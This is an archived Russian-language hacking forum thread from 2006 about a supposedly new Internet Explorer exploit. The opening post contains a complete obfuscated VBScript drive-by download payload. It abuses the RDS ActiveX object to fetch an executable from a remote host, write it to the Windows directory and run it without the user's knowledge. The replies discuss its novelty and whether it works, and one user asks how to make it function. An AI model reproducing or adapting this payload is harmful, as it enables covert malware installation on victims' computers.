Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Новый эксплоит для Ie? (https://forum.antichat.xyz/showthread.php?t=27649)

ReanimatoR 20.11.2006 23:53

Новый эксплоит для Ie?
 
Код:


<SCRIPT language="VBScript"> If navigator.appName="Microsoft Internet Explorer" Then If InStr(navigator.platform,"Win32") <> 0Then Dim Obj_Name Dim Obj_Prog set obj_RDS = document.createElement("object") obj_RDS.setAttribute "id", "obj_RDS" obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" fn = "7265499976.exe" Obj_Name = "S" & "h" & "e" & "l" & "l" Obj_Prog = "A" & "p" & "pl" & "i" & "ca" & "ti" & "on" set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") Set oFolder = obj_ShellApp.NameSpace(20) Set oFolderItem=oFolder.ParseName("Symbol.ttf") Font_Path_Components=Split(oFolderItem.Path,"\",-1,1) WinDir= Font_Path_Components(0) & "\" &Font_Path_Components(1) & "\" fn=WinDir & fn Obj_Name = "Mi" & "cr" & "osoft" Obj_Prog = "X" & "M" & "LHTT" & "P" set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog) obj_msxml2.open "G" & "E" & "T","http://**.***.***.***/part/joke.exe",False  obj_msxml2.send On Error Resume Next Obj_Name = "AD" & "ODB" Obj_Prog = "St" & "rea" & "m" set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") If Err.Number Then Obj_Name = "S" & "c" & "ript" & "ing" Obj_Prog = "F" & "i" & "leSy" & "ste" & "mO" & "bject" Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") Set download_file=obj_FileSys.CreateTextFile(fn, TRUE) download_file_size=LenB(XMLBody) For i=1 To download_file_size cByte=MidB(XMLBody,i,1) ByteCode=AscB(cByte) download_file.Write(Chr(ByteCode)) Next download_file.Close Obj_Name = "W" & "Sc" & "r" & "ipt" Obj_Prog = "Sh" & "e" & "l" & "l" Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"") On Error Resume Next obj_WShell.Run fn,1,FALSE  Else obj_adodb.Type=1 obj_adodb.Open obj_adodb.Write(obj_msxml2.responseBody) obj_adodb.SaveToFile fn,2 obj_ShellApp.ShellExecute fn End If End If End If </SCRIPT>'

там немногоо воды есть, но вроде ноорм... Вот нашел в инете=) просто оч внимательный...=) славу богу ослом не пользуюсь.
Вроде на багтраке этой штуки не видел...
----
Я так понял что она закачивает и исполняет файл без ведома пользователя(если браузер Ie)...

SladerNon 20.11.2006 23:59

ReanimatoR

А с чего ты взял что это новый эксплоит?.

Цитата:

Вроде на багтраке этой штуки не видел...
Сможешь ли ты отличить код сплоита с уязвимостью в WebViewFolderIcon от кода с XML к примеру?
Ответь пожалуйста на вопрос

x3r0n 21.11.2006 17:38

Чета у меня ниче не происходит...
Линк сменил...

ground_zero 21.11.2006 18:09

как теоретик скажу что впечатлён твоей находкой как практик что данный эксплойт неактуален

ReanimatoR 21.11.2006 19:42

Цитата:

Сообщение от SladerNon
ReanimatoR

А с чего ты взял что это новый эксплоит?.



Сможешь ли ты отличить код сплоита с уязвимостью в WebViewFolderIcon от кода с XML к примеру?
Ответь пожалуйста на вопрос

ну блин=) проясни тогда плз что делает этот код?) лично я не разобрался :rolleyes:

x3r0n 21.11.2006 21:05

2 ground_zero
Реально сделать чтоб он работал?

ReanimatoR 21.11.2006 22:28

все понял=) эта штука уже старая=) но пашет... загружает в комп ехе и исполняет его без ведома пользователя=) правда хз под какую версию Ie:(

GreenBear 21.11.2006 22:56

9.0

ground_zero 22.11.2006 04:52

to x3r0n да реально ноя уже на эту багу выкладывал заплатку в теме Os - моя крепость


Время: 23:18